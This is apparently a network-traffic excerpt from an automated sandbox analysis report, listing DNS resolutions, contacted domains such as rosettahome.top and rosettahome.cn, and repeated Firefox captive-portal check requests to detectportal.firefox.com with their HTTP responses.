                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.906932116 CET1.1.1.1192.168.2.160x7eNo error (0)dualstack.reddit.map.fastly.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.906932116 CET1.1.1.1192.168.2.160x7eNo error (0)dualstack.reddit.map.fastly.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.906932116 CET1.1.1.1192.168.2.160x7eNo error (0)dualstack.reddit.map.fastly.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.906932116 CET1.1.1.1192.168.2.160x7eNo error (0)dualstack.reddit.map.fastly.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.913726091 CET1.1.1.1192.168.2.160x3f87No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.914691925 CET1.1.1.1192.168.2.160xbb5eNo error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.967089891 CET1.1.1.1192.168.2.160x6f5No error (0)content-signature-2.cdn.mozilla.netcontent-signature-chains.prod.autograph.services.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.967089891 CET1.1.1.1192.168.2.160x6f5No error (0)content-signature-chains.prod.autograph.services.mozaws.netprod.content-signature-chains.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.967089891 CET1.1.1.1192.168.2.160x6f5No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.978099108 CET1.1.1.1192.168.2.160xe034No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.985769987 CET1.1.1.1192.168.2.160xa7e7No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.469376087 CET1.1.1.1192.168.2.160x7339No error (0)firefox.settings.services.mozilla.comprod.remote-settings.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.469376087 CET1.1.1.1192.168.2.160x7339No error (0)prod.remote-settings.prod.webservices.mozgcp.net34.149.100.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.477456093 CET1.1.1.1192.168.2.160x2c48No error (0)prod.remote-settings.prod.webservices.mozgcp.net34.149.100.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.473186016 CET1.1.1.1192.168.2.160x5639No error (0)shavar.services.mozilla.comshavar.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.500164032 CET1.1.1.1192.168.2.160xcd10No error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.507937908 CET1.1.1.1192.168.2.160x13e9No error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.601587057 CET1.1.1.1192.168.2.160x5a5dNo error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
• www.google.com
• detectportal.firefox.com
• rosettahome.top
• rosettahome.cn

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.16 | 49726 | 34.107.221.82 | 80 | 876 | C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 20:45:13.623064995 CET | 303 | OUT | GET /canonical.html HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Connection: keep-alive
Jan 14, 2025 20:45:14.089421988 CET | 298 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Length: 90
Via: 1.1 google
Date: Mon, 13 Jan 2025 21:30:35 GMT
Age: 80079
Content-Type: text/html
Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.16 | 49731 | 34.107.221.82 | 80 | 876 | C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 20:45:15.871649027 CET | 305 | OUT | GET /success.txt?ipv4 HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Jan 14, 2025 20:45:16.319284916 CET | 216 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Length: 8
Via: 1.1 google
Date: Tue, 14 Jan 2025 01:54:50 GMT
Age: 64226
Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success


                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                      2192.168.2.164973834.107.221.8280876C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.458626986 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.911051989 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80081
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.336241007 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.432166100 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80082
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:18.116981983 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:18.213208914 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80083
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:27.910443068 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:28.006788015 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80092
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 14, 2025 20:45:29.928617954 CET 303 OUT GET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
Jan 14, 2025 20:45:30.024494886 CET 298 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80094
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 14, 2025 20:45:31.118729115 CET 303 OUT GET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
Jan 14, 2025 20:45:31.214915037 CET 298 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80096
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 14, 2025 20:45:32.213998079 CET 303 OUT GET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
Jan 14, 2025 20:45:32.309587955 CET 298 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80097
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 14, 2025 20:45:34.845093966 CET 303 OUT GET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
Jan 14, 2025 20:45:34.955174923 CET 298 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80099
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 14, 2025 20:45:39.044183016 CET 303 OUT GET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
Jan 14, 2025 20:45:39.150762081 CET    298    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80104
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 14, 2025 20:45:44.472949028 CET    303    OUT    GET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
Jan 14, 2025 20:45:44.568917036 CET    298    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80109
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 14, 2025 20:45:48.058177948 CET    303    OUT    GET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
Jan 14, 2025 20:45:48.154953003 CET    298    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80113
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 14, 2025 20:45:50.899106979 CET    303    OUT    GET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
Jan 14, 2025 20:45:50.995255947 CET    298    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80115
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 14, 2025 20:46:01.004580021 CET    6    OUT    Data Raw: 00
                                                                                                                                                                                                                                                                                                                                                      Data Ascii:
Jan 14, 2025 20:46:05.500749111 CET    303    OUT    GET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
Jan 14, 2025 20:46:05.597610950 CET | 298 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80130
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Jan 14, 2025 20:46:13.037977934 CET | 303 | OUT | GET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
Jan 14, 2025 20:46:13.134193897 CET | 298 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80138
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
